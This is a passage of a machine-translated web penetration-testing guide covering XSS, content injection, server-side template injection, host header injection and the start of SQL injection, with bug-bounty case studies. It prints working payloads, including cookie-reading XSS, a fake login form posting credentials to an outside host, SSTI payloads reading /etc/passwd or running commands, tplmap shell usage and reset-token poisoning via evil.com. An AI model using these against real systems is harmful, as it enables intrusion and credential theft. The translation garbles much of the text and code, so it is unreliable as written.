• https://github.com/ismailtasdelen/xss-payload-list
• https://github.com/pgaijin66/XSS-Payloads/blob/master/payload.txt
14.3. sample Cases
14.3.1. Reflected Cross Site Scripting - Shopify Case
In October 2018, a researcher with the nick dr_dragon have found a related issue
reflected cross-site scripting on the application Shopify , In this situation, the vulnerability was found in
parameter "return_url" which allows him to inject a script in it.
On that occasion, he uses a simple payload information to generate alerts
in the form of domain names such as the following:
payload: javascript: prompt (document.domain) //
Vulnerable Parameters: return_url
Complete URL:
https: // <Any> .myshopify.com / admin / authenticate? return_url = javascript: prompt (document.do main) //

Weather | 141
As for when executed, then the output is:
Figure 150 Output from Triggered Script
To corroborate the findings that it This risky, he tried
shows cookie information that can be drawn (of course, in this case, he tried
reflect his own armed cookie payload document.cookie):
https: // <Any> .myshopify.com / admin / authenticate? return_url = javascript: prompt (document.coo
kie) //
Figure 151 Output from Triggered Script - document.cookie

Weather | 142
Need to be informed that this is because the script called reflected XSS inserted by
researcher in question is not stored in the database. However, it is enough
give attention to the Shopify to make improvements to the parameters
susceptible.
14.3.2. Stored Cross Site Scripting - Snapchat Case
July 2017 and then, a researcher with the nick mrityunjoy have discovered a related issue Stored
XSS on one endpoint belongs Snapchat , In that situation, he found that the endpoint
https://ads.snapchat.com/setup The issues lie in the parameter "business name".
In identifying a gap, the first step to do that is by entering attacker
HTML script simple form < font color = 'red'> HTML_injection </ font>. If the parameter was vulnerable,
it will be reflected HTML_Injection writing in red.
Figure 152 Trying to Inject the Simple HTML Script
Given that the injection is done in the manufacturing process of the organization, then he was
complete the process beforehand. Once completed, then he tried To toggle
invite a user to then be output resulting from the injection in question.
Figure 153 Inviting other Member

Weather | 143
Long story short, it turns out members who obtain this email finds the output of paper
HTML_Injection red.
154 Picture Script has been Reflected via Email
When the "Join" is selected, then the user will be faced with a page to enter
name that is also again showing the reflection of injection that has been done. The best thing is,
This article is stored in a database so that the examiner did not need to submit any Tired
link to a custom script.
155 Picture Script has been Reflected at the Page (and Stored at the Database)
When looking at the script is reflected by "good", then he was replaced payload
injected into a payload that could lead to a further interaction, that is like
javascript (rather than just a simple HTML form). It happens, it turns out that the script can
also ter-triggered with "very good".

Weather | 144
payload: test "> <img src = x OnError = prompt <domain)>
Figure 156 Domain Information has been Reflected via Javascript
14.3.3. Blind Cross Site Scripting - Tokopedia Case
Technically, Blind Stored XSS has a similarity with XSS in general. Things become
the difference is, on the blind XSS, an examiner will not be able to see the execution result
because the injected script (in general) ter-triggered in the backend or on a display
which can not be achieved.
For example, there is a simple registration application that has a backend that can only be
accessed by an application managers internally. In the backend of this, the manager will be able to see
information such as the data registered by the user from the front end.
One time, a tester injects a simple pop-up alerts at the first name. however
Thus, the reflection will be first name on the front end has been pre-screened so that no
pop-up window that appears. However, a reflection of the first name turned out to be reflected in the backend application
so well that when managers want to see the results of the intended user registration, then
managers will be faced with a pop-up alerts.
Conditions faced by an examiner who can not see the situation this is called backend
Blind XSS. Then how to outsmart this? In the implementation, testers can
using a tool that is quite famous to be "encounters" by force will
manager at the backend with testers in the front end. One fairly well-known that XSSHunter
( https://xsshunter.com ).
In order to obtain a clearer picture, then we will discuss one case
Related interesting XSS Blind noobsec team found on one of the features belonging to Tokopedia ,
In that situation, noobsec try to inject script (with the use of XSS Hunter) on

Weather | 145
the "name" in features products that can be encountered complaints of visitors link
https://www.tokopedia.com/contact-us/form/ban-product ,
payload: Anu "> <script src = // xxs.ht> </
Figure 157 Trying to injecting the XSS Hunter Script at Name Field
Given that this data is surely stored in the database and will certainly be reviewed by internal,
the thing to do is just waiting for the script was executed on the backend (of course,
with the caveat that if there is a separate backend and there are vulnerabilities in the current feature
reflection occurs).
After a while, it turns noobsec team also found that the situation was reflected script
well in the backend when reviewed by Tokopedia team. This is evident from their response on
Hunter used XSS dashboard noobsec team that shows some of the information in the form of
IP from the victim, screenshots, and several others.
Figure 158 Notification at XSS Hunter Dashboard

Weather | 146
To be sure, the team also visited screenshot noobsec it. From the screenshots there,
seen that there was indeed a backend dashboar that are vulnerable in terms of Tokopedia.
Figure 159 Internal Dashboard of Tokopedia - Show with Blind XSS
14.3.4. Dom Based Cross Site Scripting - Twitter Case
In December 2017, a researcher with the nick harisec find related issue Dom-Based
XSS on Twitter , Explained that he found the issue related to the nature help.twitter.com
persistents through localStorage key lastArticleHref. Should be noted that the value of
localStorage key is used to dynamically generate HTML code without
filtering. Given the concept is not given filtering, then the tester will
can be triggered shortly client side script in it.
On situation that, found that susceptibility located on javascript
https://help.twitter.com/etc/designs/help-twitter/public/js/homepage.js , Inside there are two
localStorage key parameters lastArticleBreadcrumbs and lastArticleHref.
Parameter lastArticleBreadcrumbs in this situation the data contains an array of breadcrumbs, for example,
namely [ "Help Center", "Following and unfollowing", "How to approve or deny requests follower"].
While on the other hand, the parameters lastArticleHref contains the URL of the last visit. The following
a piece of code that is vulnerable to XSS DOM:
this.lastArticleBreadcrumbs.shift ();
var t = this.lastArticleBreadcrumbs.map (function (t, r) {
=== return r e. lastArticleBreadcrumbs. length - 1? '<A class = "tWTR hp03__link-type - roman-
16 "href =" '+ e. lastArticleHref + ' ">' + t + "</a>": '<span class = "tWTR hp03__breadcrumb-color--

Weather | 147
light-gray-neutral "> '+ t +" </ span> "
});
this.breadcrumbElement.innerHTML = t.join ( '<span class = "hp03__seperator tWTR-color - light-
gray-neutral "> / </ span> ')
As seen in the pieces of the script above, there is a piece of HTML code that is generated
dynamically.
It can be seen that the parameters lastArticleHref, There are no application coding
done correctly when generating HTML code dynamically. This in turn
allowing testers to be able to inject additional HTML DOM to the browser in a way
manipulating the value of localStorage key.
A simple example is when the examiner wants to send a URL https://help.twitter.com/en/using-
twitter / follow-requests # "> <zzzz> and the URL was accessed by the victim. It happens when a link
is accessible is key in the parameter value localStorage lastArticleHref will be worth
https: //help.twitter.com/en/using-twitter/follow-requests# \ "> <zzzz>. Furthermore, when the victim
page https://help.twitter.com/ , Then the value of the parameter key localStorage
lastArticleHref will be loaded and used to generate HTML that is written into the DOM.
In this section, HTML codes that have been defined by the attacker will be displayed on the page
https://help.twitter.com/ ,
In the process of attacks designed by the examiner, he injects HTML code
uncharged fake login form. The hope is that the victim can be fooled and enter the username
and password of an account owned twitter. As for the implementation, the following is
payload used attacker to execute DOM attacks that can be waged to the
Other Twitter users:
https://help.twitter.com/en/using-twitter/follow-
requests # "> </a> </ div> </ div> </ div> </ div> </ div> </ div> </ div> </ div> </ div> </ div> </ div> </ div> <
br> <br> <br> <br> <div style = "background: # 97e3ff; position:
fixed; top: 80%; left: 50%; margin-top: -50px; margin-left: -150px; border-style: double; '> Please
sign in below: Reviews <form action = https: //bugs.thx.bz/just> username: <input type = text
name = u> Reviews password: <input type = password name = p> most <input type = submit value = 'Sign
In '> </ form> most </ div>

Weather | 148
When the associated URL accessed by the victim, then there is a victim will see the
following:
Image has 160 Script Executed at Client Side by Using Dom-Based Vulnerability
14.4. Reference of Cross Site Scripting
Cross Site Scripting is one well-known issue that has many variants both in terms of payload
or execution. The few things that presented in this guide can be said to be still
basic nature which would be developed again. Seeing these considerations, then surely
testers are expected to see a lot of these related write-ups that have been released by many researcher.
can be related reference XSS discussion:
• Rapid7 tcell application security report:
https://www.rapid7.com/globalassets/_pdfs/whitepaperguide/rapid7-tcell-application-security-
report.pdf
• OWASP TOP 10 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-
2017_% 28en% 29.pdf.pdf
• OWASP TOP 10 2017 A7-Cross Site Scripting: https://www.owasp.org/index.php/Top_10-
2017_A7-Cross-Site_Scripting_ (XSS)
• Cross Site Scripting: https://portswigger.net/web-security/cross-site-scripting
• Cross Site Scripting: https://www.veracode.com/security/xss

Weather | 149
• Testing For Reflected Cross Site Scripting:
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-
001)
• Testing For Stored Cross Site Scripting:
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
• Testing For DOM Cross Site Scripting: https://www.owasp.org/index.php/Testing_for_DOM-
based_Cross_site_scripting_ (OTG-CLIENT-001)
• Stored Cross Site Scripting Attacks: https://www.imperva.com/learn/application-security/cross-
site-scripting-xss-attacks /
• Reflected Cross Site Scripting: https://shieldfy.io/security-wiki/cross-site-scripting-xss/reflected-
xss
• DOM Cross Site Scripting: https://medium.com/iocscan/dom-based-cross-site-scripting-dom-xss-
3396453364fd
• Reflected XSS Shopify: https://hackerone.com/reports/422707
• Stored XSS on Snapchat: https://medium.com/@mrityunjoy/stored-xss-on-snapchat-
5d704131d8fd
• Persistent DOM-based XSS in https://help.twitter.com via localStorage:
• XSS Filter Evasian Cheat Sheet:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• Blind XSS On Panel Internal Tokopedia: https://noobsec.org/project/2018-11-23-blind-xss-
in-internal-panel-Tokopedia /

Weather | 150
15. CONTENT INJECTION
There will be times when an application is tested by testers will be able to reflect on an input-an
certain of the user with the result of reflection that is limited, for example, can only be
reflects the maximum form of HTML text or script.
When reflecting this text is accompanied by the possibility of giving "false information" that is enough
assured from the user side, it can be said that these applications have vulnerabilities manifold
Content injection.
15.1. Basic Concept of Content Injection
Simply put, content injection is a type of attacks that take advantage of the absence of validation
input in an application (both POST and GET Method). Quoted from OWASP, in
general, This attack is closely related to the type of social engineering attack because
utilization requires two concurrent basis , Ie exploiting vulnerabilities in
code, as well as take advantage of their victims trust.
In the implementation, Content Injection will always be "cultivated" by the examiner to make
a display may have a compelling message that certainly can deceive visitors.
Figure 161 Sample of Content Injection with Text
So what's the difference with the XSS which also seems to be able to provide the same impact?
Perhaps this is one of the questions that may arise from testers. However,
The fundamental difference between Content Injection XSS is, Content Injection requires two
the same steps to realize the occurrence of a successful execution.
For example, say testers wanted to make a victim to visit a link evil.com. On
XSS attacks, testers can either automate "displacement" victim to evil.com with javascript
simple. In other words, after visiting victims of the link (eg, in the form reflected
XSS), then the victim will automatically move to evil.com for their executions
by javascript earlier.

Weather | 151
In contrast to XSS, Injection Content still requires one more step that must be "done"
by victims, by manually clicking on the links listed on page evil.com
seen by the victim. If the victim is not clicking, it is automatically "transfer" is not
will never happen.
15.2. Kind of Content Injection
In general, there are two types of Content Injection pretty much found, namely that
text based and HTML-based.
With the same example as to an examiner who want to force their victims to
"Moved" from one link to evil.com, then:
• In Text Injection, the victim must manually copy and paste to link
evil.com he saw in a yard. While
• HTML Injection, just click directly links the victims is manually for
"Make the transition" to evil.com.
15.2.1. Text Injection - SEMRush and LocalTapiola Case
As previously discussed, in broad outline, Text Injection has a value much risk
smaller than the HTML Injection. This in itself because in the text of injection,
a victim is "obliged" to copy and paste it manually would be the
"Desired" by the examiner. If not, then it is certain that there can not be a hoax.
Some interesting examples of this related issue that is as discovered by researcher named
asad_anwar on SEMRush program and ak1t4 nick researcher with the program LocalTapiola ,
In this situation, both utilize the error message that appears on the application accompanied by
their application errors reflection text to the things that entered into the link.
Figure 162 Text Injection at SEMRush Program - https://hackerone.com/reports/327671

Weather | 152
Figure 163 Text Injection at LocalTapiola - https://hackerone.com/reports/181594
As seen, the victim must manually copy and paste the first to
really can visit evil.com link that has been incorporated by the examiner.
15.2.2. HTML Injection
As noted earlier, "the best thing" of HTML Injection is a victim
only need to click directly without having to copy and paste as experienced
on the Text Injection.
In the reality, the testers also only need to enter HTML script as simple as heading
<H1> </ h1>. When the output of these injections produce the font size change (become larger
because the h1 tag), then automatically, it can be said that the application is vulnerable
to HTML Injection. Of course, in addition to the h1 tag, testers can also use other tags such as
marquee, font color, and the like.
Some interesting example in this regard is as it has been found by researcher with
nick 0x0luke on Slack-owned program and researcher with the nihadrekanym nick-owned program
Infogram ,
15.2.2.1. Common HTML Injection - Infogram Case
In Infogram owned program, nihadrekanym found that field "Employee ID" has not done
validation of existing input allowing him to be able to insert HTML
script. The best thing is a reflection of this injection can be seen directly on the existing interface.
The simple payload entered by itself is heading h1:
<H1> hacked </ h1>

Weather | 153
Figure 164 HTML Injection at Infogram - https://hackerone.com/reports/283742
15.2.2.2. HTML Injection (Output has been Triggered via Email) - Slack Case
In contrast to the case that the output of the injection Infogram can be viewed directly on the front end, in the case
Slack owned, 0x0luke found that the output of this execution will be visible via email.
In the trial, the field "first name" has not validate the input that is so
allowing her to be able to insert HTML script. However, the reflection of this injection
will be seen through email so that will be launched with the "good" when testers are
in the same team with other members.
As a form of trial, 0x0luke insert simple tags such as <img>, followed by
trying to perform an action that makes Slack send an email automatically.
Figure 165 HTML Injection at First Name - Triggered at Email

Weather | 154
When seen, it turns <img> tag is executed with "good".
As for the execution step further, an examiner can make an appearance
convince the email in question (HTML armed with a script that can be triggered) to trick
members who are in the same group with the examiner in question.
15.3. Reference of Content Injection
Although Content Injection is one of the issues is fairly low, but can not
doubt that this issue is still sufficiently taken into account by most companies with a variety of
consideration.
The few references that can be related reference this discussion are:
• Content Spoofing: https://www.owasp.org/index.php/Content_Spoofing
• [SEMRush] Error Page Content Spoofing or Text Injection:
• [LocalTapiola] Error Page Content Spoofing or Text Injection:
• [Harvest] Text and HTML Injection at First and Last Name Parameters:
• [Slack] HTML Injection Inside Slack Promotional Emails: https://hackerone.com/reports/321029
• [Infogram] HTML Injection at empoyee ID: https://hackerone.com/reports/283742

Weather | 155
16. SERVER SIDE TEMPLATE INJECTION (SSTI)
Quoting from a detailed paper entitled Server-Side Template Injection: RCE for the modern webapp that
written by James Kettle, she explained that the template engines pretty much used by
Web-based applications to present dynamic data through web pages and email.
In general, there are several types of template engines are quite popular use among
developers, namely as:
• Jinja, Mako and Tornado (using the Python programming language)
• Smarty and Twigs (using PHP)
• Jade and Rage (using the Javascript programming language)
• Liquid (using the Ruby programming language)
• Velocity and Freemaker (using the Java programming language)
However, the best a template engines use if it is not accompanied by
proper validation, then it will be able to pose a potential issue. In this case, the use of
injection results in a template engines (which have an impact on the server side) have close links
the vulnerability, named "Server-Side Template Injection". In its application, the attack
This in itself can be used directly to attack the internal web applications and often also
can develop into RCE (Remote Code Execution).
16.1. Server Side Template Injection 101
Still in the same paper, James explains that there is a methodology that efficiently
identify vulnerabilities associated with server-side template injection. In the methodology, there are
some measures such as detection and identification, which is followed by an
exploitation process that starts from reading the documentation, exploration, then
ended with the assault. The following diagram of the process that created by James Kettle on
paper made:

Weather | 156
Figure 166 SSTI Methodology - SSTI: RCE for Modern Web App by Portswigger
16.1.1. Detection
In the initial phase, the examiner must perform detection. In the detection,
testers can use some sort of wappalyzer tools in a browser that can be used
to help identify related technologies used in an application.
Wappalyzer itself can be downloaded from the official page https://www.wappalyzer.com/ ,
When it is installed on the browser used, then it will appear near the address wappalyzer
bar which when clicked will display information such as the example shown in the picture
under:
Figure 167 The Used of Wappalyzer
In addition to using wappalyzer, testers can also use tools called buildwith that
can be accessed on the official page https://builtwith.com , The output generated by this tool
quite complete as shown in the following figure:

Weather | 157
Figure 168 The Used of Buildwith Tools
After knowing the technology used, then the next step is testing can
try to manually an injection with a simple fuzzing. An example is the
using multiplication arithmetic payload such as {{ 7 * 7}}. When an application is vulnerable to
injection execution, then the application will display the output in the form of 49 that may arise
directly or indirectly (such as through email). Why 49? It is simply
as a template engines will process these arithmetic operations (with basic multiplication between 7
with 7).
And of course the other way around, if the application is not vulnerable, then the application will remain
displays corresponding output of input, namely {{7 * 7}}.
16.1.2. Identification
After successfully detect vulnerabilities that exist, then steps must be done is
identify the template engine used in the target application. Here is a picture
tree decisions made by James Kettle to help identify the template engines
used.
Sample readings namely when a tester to injection by using payload
{{7 * 7}}, and then managed to output 49, then it is likely that template engines

Weather | 158
used is Jinja2 or twig. And so on as shown in the following figure:
Figure 169 Decision Tree to Identify the Template Engines - by James Kettle
16.1.3. Exploitation
The last stage took was certainly exploit.
Stages of exploitation are generally divided into three steps, which consist of the reading process,
mengksplore process, and the process of conducting an attack.
As seen, the first step you need to do is read the documentation testers
of template engines used in the target application. This process is useful for finding out
like the basic syntax used and find out the relevant template engines are used. Thing
This of course is expected to be a clue to the success of the process of exploitation.
Thereafter, the next process is the exploration of the target environment for
know exactly will be things that can be accessed and utilized. This exploration process can
be looking for a class contained in the template engines.
And the last step of this stage is to attack. The concept of the attack itself
quite diverse, which can use the payload that can be used to read the file
contained on the server (such as read / etc / passwd), write files to the server, or
even to perform remote code execution.

Weather | 159
Here is a collection of payloads that can be used in the exploitation
server side template injection vulnerabilities on a variety of template engines. As a quick note,
These payloads can be obtained at the github page belongs swisskyrepo Payload entitled All The
Things - Server Side Injection templates that can be accessed at the following link:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%2
0Injection
Figure 170 Templates injections Cheat Sheets
Ruby
Injection to identify SSTI <% = 7 * 7%>
Injection to read the file / etc / passwd <% = File.open ( '/ etc / passwd'). Read%>
Injection to see a list of files and folders <% = Dir.entries ( '/')%>
Java
$ {7 * 7}
Injection to identify SSTI
$ {{7 * 7}}
$ {T (java.lang.Runtime) .getRuntime (). Exec ( 'cat

Injection to read the file / etc / passwd
etc / passwd ')}
Injection to get the system's

$ {T (java.lang.System) .getenv ()}
environtment variables

Weather | 160
Twig
• {{7 * 7}}
• {{7 * '7'}}
• {{Self}}
• {{_Self.env.setCache ( "ftp://attacker.net:2121")}}
injection for code execution {{_Self.env.loadTemplate ( "backdoor")}}
• {{_Self.env.registerUndefinedFilterCallback ( "exec")}}
{{_Self.env.getFilter ( "id")}}
Smarty
Ijeksi to identify STTI {{7 * 77}}
injection for code execution {Php} echo `id`; {/ php}
Feemarker
• $ {3 * 3}
• # {3 * 3}
• <#Assign ex =
"Freemarker.template.utility.Execute"? New ()> $ {
ex ( "id")}
injection for code execution
• [#Assign ex =
'Freemarker.template.utility.Execute'? New ()] $ {
ex ( 'id')}
Jinja2
Ijeksi to identify STTI {{7 * 77}}
{{Config.items ()}}
Injection to view the class that is used {{[] .Class.base.subclasses ()}}
{{ '' .Class.mro () [1] .subclasses ()}}
{{ '' __.__ class MRO .__ __ [2] .__ subclasses __ ()}}

Weather | 161
Injection to see all the config variable {% For key, value in config.iteritems ()%}
5. <Dt> {{key | e}} </ dt>
6. <Dd> {{value | e}} </ dd>
Endfor% {%}
Injection to read the file {{ '' __.__ class MRO .__ __ [2] .__ subclasses __ ()
[40] ( '/ etc / passwd'). Read ()}}
16.2. Server Side Template Injection - Uber Case
On March 25, 2016, a researcher with the nick Orange managed to find vulnerabilities related
SSTI at Uber-owned web application ,
To identify gaps in SSTI, orange perform profilenya name change to {{ ' 7 '* 7}}.
If the feature was vulnerable, then the application should be to restore the output value 7777777.
Why produce such values? Because the input in question, the value of string 7 multiplied by as much as
7 times so that its output was menajdi 7777777. If related features are not vulnerable, then of course
the output will be valuable as an input-its.
It is quite interesting here is the vulnerability turned out to only be "seen" when Orange
trying to do the action that makes Uber send an email containing his profile name
which has been injected. As on that occasion, the action taken is to try
memperbahurui his uber account. For more details, see the picture below:
Figure 171 Templates Injection at Uber
Seen in the picture section Hi 7777777, this indicates that injection payload

Weather | 162
{{ '7' * 7}} already successfully executed properly. From here, it can be concluded that the parameters
profile name susceptibility to injection attacks.
Although Orange has managed to find the desired output of a simple fuzzing, unfortunately
Orange has not managed to change the susceptibility to ride to remote code execution. This matter
due to the presence of the limitations of the character "acceptable" by Uber on the part of the profile name.
Although it failed to continue execution to RCE, Orange itself has secured class from
servers use payload {{[]. class.base.subclasses ()}} and {{ ''. class.mro () [1] .subclasses ()}}.
Here is a look class who succeeded in getting through the onslaught of SSTI.
Figure 172 Dumping the Class via SSTI
In addition to successfully display the classes that are available on the server, Orange also managed to execute code
in the form of a python. The payload is used to perform an action that is by
payload {% for c in [1,2,3]%} {{c, c, c}} {% endfor%}
Trying to Figure 173 Executing the Python Code

Weather | 163
16.3. Server Side Template Injection - Intel Case
A researcher named Suleman Malik has managed to find vulnerabilities associated with SSTI in
one of Intel's new web-based applications with a different approach with Orange.
On that occasion, he found a vulnerability on the part First Name and Last Name. In
part First Name, he tried to enter payload charged sul {{9 * 9}}. While on the
Last Name, he includes payload charged malik {{9 * 9}}.
In accordance with the theory that has been described previously, when part of the application that are vulnerable to
SSTI, the application will generate value sul {{81}} malik {{81}}.
Figure 174 Trying to Put the Payloads
From the results, he was trying to reset the password for the purpose of
see related output first name and last name that has diinjeksikannya. From these results, it turns out
he found that the application responds with the execution of arithmetics.
Figure 175 Intel Application has responsed the Input

Weather | 164
In the experiments, Suleman successfully develop execution intended to retrieve files
located on the server where the application resides. This in itself is evidenced by the success of
taking the value of / etc / passwd.
The payload entered by him in the first name is
{Php} $ s = file_get_contents ( '/ etc / passwd'); var_dump ($ s); {/ php.
By re-did request a password reset, then the output of reading file
/ Etc / passwd was successfully obtained.
Figure 176 Read the / etc / passwd via SSTI
16.4. Server Side Template Injection with TPLmap
TPLmap is a tool that can be used to make the process of exploitation of a vulnerability
server side injection template automatically. These tools can be developed by Emilio
obtained through official github page that addresses the https://github.com/epinna/tplmap ,
Technically, TPLmap made using python programming language, so it is necessary
Installation of the python before using.
Until now, TPLmap itself can be used to exploit the 15 template engines
consists of Mako, Jinja2, Python (eval code), Tornado, Nunjucks, Pug, Dot, Marko, Javascript (code
eval), Dust, EJS, Ruby (eval code), Slim, ERB, Smarty, PHP (eval code), Twig, Freemarker, Velocity.
For the acquisition, these tools can be downloaded by executing a command
fairly simple as the following:
git clone https://github.com/epinna/tplmap.git

Weather | 165
Citing the TPLmap github page, here is an example of exploitation step SSTI
using TPLmap:
$ ./Tplmap.py -u 'http://www.target.com/page?name=John'
As a simple note, -u is used to declare the URL address that want to be exploited.
Outputs to be produced tools SSTI's when discovered vulnerability in an application, less
more like the following:
[+] Testing if the GET parameter 'name' is an injectable [+] Smarty
plugin is testing the rendering with the tag '{*}' [+] Smarty plugin is
testing blind injection [+] Mako plugin is testing the rendering with the
tag '$ {* } '
,,,
[+] Jinja2 rendering plugin is testing with the tag '{{*}}' [+] Jinja2 plugin
has confirmed the injection with the tag '{{*}}' [+] Tplmap identified the
following injection point:
GET parameter: name
Engine: Jinja2 Injection: {{*}}
Context: text OS: Linux
Technique: render
Capabilities:
Shell command execution: ok Bind
and reverse shell: ok File write: ok
File read: ok
Code evaluation: ok, python code
At this output, it appears that TPLmap successfully exploit vulnerabilities found in
target application. As for technical, this vulnerability lies in the method GET in parameter
"Name".
On the other hand, TPLmap also been successful in identifying the template engines used in
it is Jinja2.
Having managed to find out that the target turned out to be susceptible to SSTI, testers can be

Weather | 166
exploitation by using the options contained in the relevant tool. In this case,
testers can try to execute remote code execution by utilizing --os-shell option:
$ ./Tplmap.py --os-shell -u 'http://www.target.com/page?name=John' [+] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Run commands on the operating system.
linux $ whoami
www
linux $ cat / etc / passwd root: x: 0: 0: root: / root: / bin /
bash daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
16.5. Reference of Server-Side Template Injection
In order to maximize the exposure that has been submitted related SSTI, the testers can be
referring to some of the following references:
• Server-Side Template Injection: RCE for the modern webapp -
https://portswigger.net/kb/papers/serversidetemplateinjection.pdf
• Server-Side Template Injection Introduction & Example -
https://www.netsparker.com/blog/web-security/server-side-template-injection/
• Exploiting Server Side Template Injection With Tplmap -
https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf
• Payload All The Things - Template Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Templat
e% 20Injection
• Uber.com may RCE by Flask Jinja2 Template Injection - https://hackerone.com/reports/125980
• [Intel] Bug Hunting in Web App - https://www.owasp.org/images/c/ce/OWASP-
London20170928-Suleman_Malik-PDF.pdf
• Tplmap - https://github.com/epinna/tplmap

Weather | 167
17. HOST HEADER INJECTION (HHI)
As already known, is basically a request that is sent from an application
towards server always consists of feedback from users on a link in the address bar owned
the browser then continued with the delivery of several key parameters such as the value of the host,
content-length (if the form POST / PUT Method), User-Agent (a marker of the type of browser usage
particular), the intended path of a host (eg / login, / delete, or otherwise), as well as some
Other things such as the origin and referrer.
For example, users want to type a link http://destination.com/path/of/application
in his address bar, then automatically, the application will send a HTTP Request as
following:
GET / path / of / application HTTP / 1.1
host: destination.com
Accept: * / *
User-Agent: zzz
Origin: destination.com
As seen in a small segment of the example above, when a visit to destination.com
done, then the application again sends the value "Host" in the request with the same value
such links are included in the address bar of the browser belongs. It is indirectly
confirms that basically there is a difference Among Hosts value delivered
by application with which is input via a link in the browser address bar. In summary, then
testers can see the picture as simple as the following:
Figure 177 Sample of Request
At the top right of the display burpsuite, it is seen that there is a full link is located
in https://account.asus.com , Specifically, the identity of this section is representative of the input
given by the user to the browser (via the address bar).
However, in the bottom left, there is also a delivery parameter "Host" with value
which is also the same domain. Long story short, this parameter is called the "Host Header". On

Weather | 168
Basically, the Host Header has a role to tell the web server on the virtual
host is used (if it has been set / set). By default, the value of this header host
will always follow any input form the given link users through browsers
used.
However, in the development of applications, often times the value of the host header is not
set / validated allowing a tester to perform manipulation on
the value of existing host that can then be used for trick the victim. When
an application is not performing validation of the value of the host header, then the application referred to
said to be vulnerable to Host Header Injection.
17.1. Kind of Host Header Injection
Some types of execution Host Header Injection are commonly conducted by researchers ranged at:
• Enable a tester to redirect requests from one victim toward
to another link. In this case, the parameters of a Host Header manipulated to divert
links to other users who basically do not want to visit.
In reality, the value of risk at this point is relatively small because it requires several stages
which must be taken by the examiner to make a user successfully deceived heading
to another link that has been prepared.
• Then the second model is the execution that enables an examiner to
manipulating a link sent via e-mail server. Specifically, it has
higher level of risk because it allows the occurrence of an account takeover
users.
17.2. Host Header Injection - Redirection - Whisper Case
In this type, Host Header Injection executed by a tester "only" limited
the realm of distorting a user (victim) of the one link that would target heading to the links
Other prepared by the attacker.
Technically, it would require a "position" of a tester that can perform
intercept of the traffic from the victim. On this basis the one (of the many basic) then this issue
is considered a issue that has a low level of risk.
In order to clarify the situation in this case, it will be discussed one of the issues found
by a researcher with a nick on the program belongs Whisper 1N3 ,

Weather | 169
In general, when a user is about to visit the official application belong to Whisper, then
certainly intended user will visit whisper.sh. However, proving 1N3
that he was capable of diverting users from whisper.sh request a link to another (in
it is crowdshield.com) by modifying the value of "Host Header".
Figure 178 Modifying the Host Header from Whisper.sh to Crowdshield.com
As seen in the figure, when a request is sent to the server, the server also responds
to make the shift link from whisper.sh towards crowdshield.com. This in itself can
seen on the right side interceptor with representatives tag named "Location".
17.3. Host Header Injection - Account Takeover - The Concept
For the second technical of the Host Header Injection, generally associated with the execution of Account Takeover
which generally involves a feature "reset password".
Reset password itself is one common feature which is quite common users
in an application serving openly registration services. As the name implies, features
This would be expected to be used effectively by users who have difficulty
to login due to experience difficulties in remembering the password it uses.
In the implementation in general, when a user performs a password reset, then
he automatically will receive a unique token that is sent via registered mail
hers. However, the problems become apparent when the link is sent from the server
email to be changed due to the manipulation of the value of the host conducted by examiners.

Weather | 170
For example, the normal process, should the user will get full links
as https://destination.com/index.php/password/do_reset?key=8d1f26586a46ff6a6aa384ab8a9 ,
However, because there is manipulation of the value of the host header, then the link sent
from email to the server was changed from destination.com be evil.com. Here is an example of the link
details: https://evil.com/index.php/password/do_reset?key=8d1f26586a46ff6a6aa384ab8a9 ,
To be clear, it can be observed the following picture:
Figure 179 Sample of Host Header Injection
From the pictures, it appears that there are changes in the value of a host of example.com into evil.com
due to the presence of the host header manipulation is done testers.
Note: source image of SkeletonScribe.net about Practical Host Header Injection ,
So how can this be attributed to the "Account Takeover"?
Simply put, when a victim visits the link in question (which leads to
evil.com), then automatically, the servers belonging to the examiner will keep a log in the form of a request from
victim. In this case, the log belongs to the testers would be charged a token that can be used directly
by testers to reset the password of the victim (remember that the token is
a fresh token). Here is one example of the log to be obtained testers
when victims have clicked on a link that has been modified through the execution of HHI:
Figure 180 Sample of logs at the assessor's Server

Weather | 171
For information, when testers using apache, then the location of the log can be found in
/var/log/apache2/access.log.
17.3.1. Host Header Injection - Account Takeover - Mavenlink Case
On October 22, 2017, a researcher with the nick cablej find quite interesting issue
Related HHI-owned program Mavenlink ,
On that occasion, he found that Mavenlink has conducted validation of the value
host is thus only receive the value "mavenlink.com". However, cablej do
manipulation by "tricking" the validation has been done so that the validation itself can be
bypass. The payload used are:
example.com ? .mavenlink.com
Having thus manipulated payload and sends it to the server, it Mavenlink
at the time of the "reply to" request that is to include the value of the hosts that have been manipulated.
Figure 181 Bypassing the Protection of Host Header Injection
Furthermore, the tester only need to monitor logs on his server to then be
take a fresh-token that is "transmitted" by victims who deceived.
17.4. Reference of Host Header Injection
In order to maximize the understanding of the exposures that have been submitted related Host
Header Injection, the testers can refer to some of the following references:
• Web Servers and the Host Header: https://serversforhackers.com/c/webservers-host-header
• What Is a Host Header? https://www.itprotoday.com/devops-and-software-development/what-
host-header

Weather | 172
• Practical HTTP Host Header Attacks: https://www.skeletonscribe.net/2013/05/practical-http-
host-header-attacks.html
• Host Header Injection: https://lightningsecurity.io/blog/host-header-injection/
• [Whisper] Host Header Injection - Redirection: https://hackerone.com/reports/94637
• [Mavenlink] password reset link Allows injection redirect to malicious URL:

Weather | 173
18. SQL INJECTION
SQL injection's being one kind of attack that are web applications that aim to
gain access to a SQL-based database systems. According to the report state of the internet
security report from Akamai Q4 2017 , SQL injection is ranked first with acquisition
percentage of 50%. Then, by OWASP TOP 10 2017 , SQL injection entry
in category A1 Injection with ranks. Based on these data, of course, can
seen that SQL Injection is still one of the types of vulnerabilities are quite popular and
common in modern web applications though.
Web Apps Attack Frequency Q4

2017
60%
50%
40%
30%
20%
10%
0%
SQL LFI XSS RFI PHPi Others

injection
Figure 182 SQL Injection Rank from Akamai and OWASP
Simply put, the attack SQL injection occurs because exploiting a vulnerability found
